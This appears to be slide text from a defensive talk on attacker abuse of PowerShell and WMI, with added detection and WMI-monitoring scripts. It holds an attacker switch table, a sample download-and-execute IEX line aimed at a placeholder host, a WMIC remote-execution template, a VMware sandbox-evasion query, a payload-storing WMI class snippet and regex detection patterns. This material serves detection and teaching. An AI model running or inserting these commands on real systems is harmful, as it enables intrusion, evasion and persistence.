Windows Logs Forensics - Powershell and WMI

This document discusses how PowerShell and WMI can be leveraged by attackers due to their powerful capabilities for system administration and interaction. It provides examples of how these tools are used in real-world attacks and recommendations for establishing visibility and detecting malicious usage. Detection and defense requires baselining normal usage, identifying abnormal commands, and monitoring logs for suspicious WMI and PowerShell activity.

• Quick Background

• Malicious Possibilities
• Real-World Examples
• Detection & Defense
• Joe Slowik, Adversary Hunter
• Current: Dragos Adversary Hunter
• Previous:
• Los Alamos National Lab: IR Lead
• US Navy: Information Warfare Officer
• University of Chicago: Philosophy Drop-Out
• Scripting and interactive language
• Introduced in 2006, integral to Win7+ since 2009
• Full access to COM & WMI for system administration
• WMI = Windows Management Instrumentation
• Interactive and scriptable framework for local and remote administration
• Frequently accessed via PowerShell
http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
http://www.opentechguides.com/how-to/article/powershell/132/get-system-info-remotely.html
https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
• PowerShell is a powerful, useful tool for network administration
• Widely used in Windows Enterprise environments
http://www.freeiconspng.com/img/17209
• WMI enables significant access to review and modify system data
• Access via PowerShell allows for scripting and automation
• PowerShell’s ubiquity adds a significant capability for a potential attacker
• Enhances the ability to ‘live off the land’
• Expands initial infection vectors
Command                                            Use
-EncodedCommand                                    Accepts Base64-encoded input for execution within PowerShell
(New-Object System.Net.WebClient).DownloadFile()   Download a file from a remote location; can be piped to Start-Process to execute
-ExecutionPolicy Bypass                            Circumvent system limits on script execution
-WindowStyle Hidden                                Hide the command window from the user
Invoke-Expression                                  Execute arbitrary code or commands
Delivery vectors (diagram): VBA, VBS, JS, BAT, .lnk shortcuts, Startup folder, Registry
https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
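Added example, not from the slides and not the author's code: a PowerShell check that scores a process-creation command line (the CommandLine field of a Sysmon Event ID 1 or Security 4688 record) against the indicators in the table above and decodes any -EncodedCommand payload so it can be read and baselined. The sample command lines, the SRV01 host and the example.invalid URL are constructed.

```powershell
# Added example, not from the slides: score a process-creation command line
# (Sysmon Event ID 1 / Security 4688 CommandLine field) against the indicators
# in the table above and decode any -EncodedCommand payload for review.
function Get-PowerShellIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Indicator name -> regex. powershell.exe accepts unambiguous prefixes of its
    # switches (-enc, -ep, -w), so the patterns accept those short forms too.
    $Patterns = [ordered]@{
        EncodedCommand        = '(?i)\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}'
        ExecutionPolicyBypass = '(?i)\s-(ep|ex|exec|executionpolicy)\s+bypass'
        WindowStyleHidden     = '(?i)\s-w(indowstyle)?\s+hidden'
        WebClientDownload     = '(?i)net\.webclient\)?\.download(file|string)'
        InvokeExpression      = '(?i)(^|[\s;|(])(invoke-expression|iex)\b'
        WmicRemoteProcess     = '(?i)\bwmic\s+/node:\S+\s+process\s+call\s+create'
    }
    $hits = foreach ($name in $Patterns.Keys) {
        if ($CommandLine -match $Patterns[$name]) { $name }
    }

    # -EncodedCommand carries Base64 of the UTF-16LE script text; decoding it
    # turns an opaque blob into something that can be read and baselined.
    $decoded = $null
    $m = [regex]::Match($CommandLine, '(?i)\s-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
    if ($m.Success) {
        try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value)) }
        catch { $decoded = '<not valid Base64>' }
    }
    [pscustomobject]@{
        CommandLine = $CommandLine
        Indicators  = @($hits)
        Score       = @($hits).Count
        Decoded     = $decoded
    }
}

# Constructed samples (not real logs): a routine admin launch, a launch stacking
# the table's switches, and a WMIC remote execution in the form shown later.
$inner   = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$Samples = @(
    'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1',
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc $encoded",
    'wmic /node:SRV01 process call create "powershell -w hidden -ep bypass -c iex($x)"'
)
$Samples | ForEach-Object { Get-PowerShellIndicators -CommandLine $_ } |
    Where-Object Score -gt 0 |
    Format-List CommandLine, Indicators, Decoded
```

The benign backup launch scores zero and drops out; the other two are listed with their matched indicators, and the encoded one shows the decoded download-and-execute one-liner.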
• WMI is also ubiquitous, potent ‘dual-use’
• Can enable:
• Complex exploitation, persistence of infected host
• New vectors to pivot within network
• PsExec-like remote execution
• Malicious file/script storage
• Persistence when combined with file or registry activity
• Pentesting frameworks
• Crimeware/Commodity malware
• APT
• Malicious VBA decodes to PowerShell
• Retrieves, then executes ransomware payload
• WMI filter retrieved on schedule
• Returns base64-encoded PowerShell
• PowerShell re-launches backdoor

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
Visibility by layer (diagram):
• CMD: command execution; execution parameters
• PowerShell: interactive and scripts; flags, modifiers, full visibility
• WMI: log events; correlate with other activity
What is required to achieve ‘bad’? Download, Upload, Encode, Decode, Process Execution, Persistence
• Sysinternals Sysmon
• Windows Logging Service (WLS)
• WMI Logging via WMI Subscription
• PowerShell Logging
• Proprietary Host-based Security
• WLS incorporates PowerShell logging natively
• Otherwise:
• Windows 7+
• PowerShell 5.0+
• Enable logging!
• See:
• https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
• Sysinternals Sysmon – latest version includes WMI visibility
• But logging/alerting will need to be tuned
• DIY via WMI Subscription creation
• Otherwise – commercial products
Detection & defense cycle (diagram): Establish Visibility → Baseline ‘Normal’ → Identify Malicious → Create Alerts & Alarms → Develop Response
• What PowerShell/WMI scripts are used in ‘normal’ network administration?
• What commands never have legitimate use?
• What – if any – items require whitelisting?
Remote process creation through WMIC:
wmic /node:REMOTESYSTEM process call create "EVIL_COMMAND"

WQL query checking whether the host is a VMware virtual machine (a typical VM/sandbox evasion check):
SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE "%VMware%"

PowerShell creating a custom WMI class to store a payload in the WMI repository:
$BADTHING = New-Object Management.ManagementClass($REMOTESYSTEM, [String]::Empty, $null)
$BADTHING['__CLASS'] = 'Evil_Malware'
$BADTHING.Properties.Add('SomethingEvil', [Management.CimType]::String, $False)
$BADTHING.Properties['SomethingEvil'].Value = $PAYLOAD
$BADTHING.Put()
• Create Event Consumer: performs action when triggered by event
• Pair with Event Filter: events of interest
• Filter to Consumer Binding: bind filter to consumer
• Export results to log file, data store
• Credit: https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
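Added example, not from the slides or the FireEye post: the filter, consumer and binding steps above assembled into a PowerShell "WMI vs WMI" monitor, which is also the do-it-yourself "WMI Logging via WMI Subscription" option listed earlier. The object names, the log path and the assumption that standard-string templates expand the __CLASS and __RELPATH system properties are mine.

```powershell
# Added example, not from the slides or the FireEye post: the three objects
# above assembled into a "WMI vs WMI" monitor. A __EventFilter watches
# root\subscription for new filters, consumers or bindings (what any WMI
# persistence needs), a LogFileEventConsumer appends each hit to a text log
# for collection, and a __FilterToConsumerBinding ties them together.
# Run as administrator. Object names and the log path are my own choices.
$Namespace = 'root\subscription'
$LogPath   = 'C:\ProgramData\WmiSubscriptionMonitor.log'

function Install-WmiSubscriptionMonitor {
    # Polls every 5 s. ISA also matches derived classes, so every consumer type
    # (CommandLine, ActiveScript, ...) is caught by '__EventConsumer'.
    $Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE " +
             "TargetInstance ISA '__EventFilter' OR " +
             "TargetInstance ISA '__EventConsumer' OR " +
             "TargetInstance ISA '__FilterToConsumerBinding'"
    $Filter = Set-WmiInstance -Namespace $Namespace -Class __EventFilter -Arguments @{
        Name = 'SubscriptionMonitor'; EventNamespace = $Namespace
        QueryLanguage = 'WQL'; Query = $Query
    }
    # %...% are WMI standard-string-template substitutions filled from the event.
    # Assumption: system properties (__CLASS, __RELPATH) expand like any other;
    # fall back to %TargetInstance.Name% if a platform does not expand them.
    $Consumer = Set-WmiInstance -Namespace $Namespace -Class LogFileEventConsumer -Arguments @{
        Name = 'SubscriptionMonitorLog'; Filename = $LogPath; IsUnicode = $false
        Text = '%TIME_CREATED% new %TargetInstance.__CLASS%: %TargetInstance.__RELPATH%'
    }
    Set-WmiInstance -Namespace $Namespace -Class __FilterToConsumerBinding -Arguments @{
        Filter = $Filter; Consumer = $Consumer
    }
}

function Remove-WmiSubscriptionMonitor {
    # Binding first, then its filter and consumer.
    Get-WmiObject -Namespace $Namespace -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match 'SubscriptionMonitor' } | Remove-WmiObject
    Get-WmiObject -Namespace $Namespace -Class __EventFilter -Filter "Name='SubscriptionMonitor'" |
        Remove-WmiObject
    Get-WmiObject -Namespace $Namespace -Class LogFileEventConsumer -Filter "Name='SubscriptionMonitorLog'" |
        Remove-WmiObject
}

Install-WmiSubscriptionMonitor | Out-Null
# From now on any new WMI subscription (including the filter/consumer chain the
# APT example above relies on) leaves a line in $LogPath; baseline the
# legitimate ones with the questions above before alerting on the rest.
Get-Content $LogPath -ErrorAction SilentlyContinue
```

Verify the three objects with Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding; Remove-WmiSubscriptionMonitor tears them down again.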
